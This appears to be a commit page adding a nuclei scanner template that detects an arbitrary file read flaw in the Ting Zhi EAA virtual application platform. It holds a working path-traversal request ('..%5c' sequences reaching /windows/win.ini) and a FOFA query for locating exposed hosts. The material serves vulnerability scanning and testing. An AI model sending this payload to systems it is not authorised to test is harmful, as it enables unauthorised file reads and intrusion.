Merge branch 'main' of https://github.com/momika233/nuclei-templates into pr/7889
commit
acb13582ab
|
@ -0,0 +1,31 @@
|
|||
id: EAA-Arbitrary-File-Read
|
||||
|
||||
info:
|
||||
name: EAA Arbitrary file read
|
||||
author: momika233
|
||||
severity: high
|
||||
description: |
|
||||
Ting Zhi Technology VA virtual application platform arbitrary file reading vulnerability
|
||||
reference:
|
||||
- http://www.tzfse.com.cn/
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
fofa-query: body="EAA益和应用接入系统"
|
||||
tags: EAA,Arbitrary-File-Read
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "extensions.*"
|
Loading…
Reference in New Issue